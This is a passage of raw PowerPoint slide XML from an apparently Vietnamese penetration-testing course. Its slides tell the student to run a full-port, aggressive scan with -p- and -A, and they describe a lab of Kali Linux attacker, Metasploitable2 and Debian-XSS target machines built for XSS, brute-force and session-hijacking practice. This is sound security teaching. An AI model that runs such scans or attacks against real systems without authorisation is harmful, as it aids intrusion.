              <a:t>hệ</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thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>.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49DBC-5F3C-9852-3EF8-5102464D2E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FFC49C5-2382-9862-1063-A242FC13905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2B4CE3F6-A773-A6B2-D922-CD1D71A89A2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80</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B84F622-DE71-959C-23A3-4CF706904D67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625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Tiến hành quét sâu hơn với hai tham số -p- và –A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AA0AFE-A667-267D-29E8-4FD987647C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="970460"/>
            <a:ext cx="8382000" cy="4566717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37255596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32CC8-1573-78EE-B45A-E31548934F3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DBF28A5-123D-179F-B496-4E03183BDD65}"/>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071509A8-C1E7-3DD5-9AA8-B8A4E0A94BBC}"/>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81</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0340C783-21C1-8E6C-3461-7368464365DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625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Tiến hành quét sâu hơn với hai tham số -p- và –A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4368CB81-79AB-7066-3573-92414D40BB00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="277633" y="1216227"/>
            <a:ext cx="8588734" cy="3282545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1083386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15BA6-FE17-0CF9-7AF9-3921054174D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57CCBF-F714-6D3F-F2D8-96D4059BAC4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C8ACBC62-8CE6-1968-9EBB-C662015C7E3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82</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298FE02D-7342-24A9-66DB-F2FF22107702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625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Tiến hành quét sâu hơn với hai tham số -p- và –A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DCE2E77-9B32-7339-EC7C-2BA48019677E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205388" y="1028700"/>
            <a:ext cx="8733223" cy="4521177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2032673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FE315-9BE2-56C2-018B-36AD4AF3659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BECE004-EED8-F999-BF3F-17FFA2029F03}"/>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A55431DB-64B9-420D-B989-868973E6C44F}"/>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83</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADAA41D7-F042-6896-B798-A1E22D343767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625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Tiến hành quét sâu hơn với hai tham số -p- và –A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07C3A6E2-A5D6-89FF-A058-0B0A086C66C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205388" y="1028700"/>
            <a:ext cx="8733223" cy="4521177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7191348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D8C2C-EB5C-966F-E491-933008474CB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92F2560-602C-EF2D-EF30-109AB77EBEE6}"/>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5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF4570C-1D88-C0C1-F966-DDAA21BB283A}"/>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84</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77C03CBA-1F3A-C25A-5CC1-235E5A7B03EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="266700"/>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Tiến hành quét sâu hơn với hai tham số -p- và –A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B223FC10-49D1-FF8E-562E-E787435FFB0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205388" y="1028700"/>
            <a:ext cx="8733223" cy="4521177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9860740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05888-D1D8-3232-0C0C-3959F2AD7B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4CB5D6A-96ED-38ED-935A-2391E28E272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899D5B2A-C644-08F2-97BB-3F6987A1A6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.2.	 Các công cụ và môi trường thực hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fi-FI" spc="-20" dirty="0"/>
              <a:t>3.2.1.	Máy ảo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fi-FI" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69C95BC-9FD0-3B9C-1744-95AA31EC3C9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85</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07FF3F8A-7759-17CF-96D8-5846AD9B9FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2336962"/>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Kali-Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Máy tấn công, tích hợp sẵn hàng loạt công cụ khai thác lỗ hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879851B5-F1C4-F11F-90A0-A698E08CED7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786711" y="2935105"/>
            <a:ext cx="5220335" cy="2567940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33514109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DEF24-0034-0721-FBFF-2D94987740C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206A7A-7361-9515-7C5B-F69DAC5BE9EA}"/>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72CFCFE5-450B-9848-CE35-89F5B7294FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fi-FI" spc="-20" dirty="0"/>
              <a:t>3.2.1.	Máy ảo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEA4001C-0CA0-253B-F20E-D962AFBF8E3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86</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C4C659-1547-C6A9-E824-A79C1AFECFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1135351"/>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Metasploitable2-Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Máy chủ mục tiêu có cài sẵn nhiều dịch vụ dễ bị tổn thương.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86CCFC6B-9487-FCAA-97EE-04AED8A4411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733550" y="2318812"/>
            <a:ext cx="5448300" cy="3752672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17181485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586DD-CDCE-3BF6-1359-B37F3FE83A0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49148EB-F4FF-11DC-2DB7-103BD7C9B0E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A0B2B2C2-180F-1524-7389-16394BE9EA9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fi-FI" spc="-20" dirty="0"/>
              <a:t>3.2.1.	Máy ảo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4C12FC-8C9B-F18D-BE7A-179E8B44967D}"/>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87</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{491C8476-C2D6-0660-D148-BE4C000FC0A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1257300"/>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Debian-XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sẵn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trợ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>BruteForce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, Session Hijacking.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
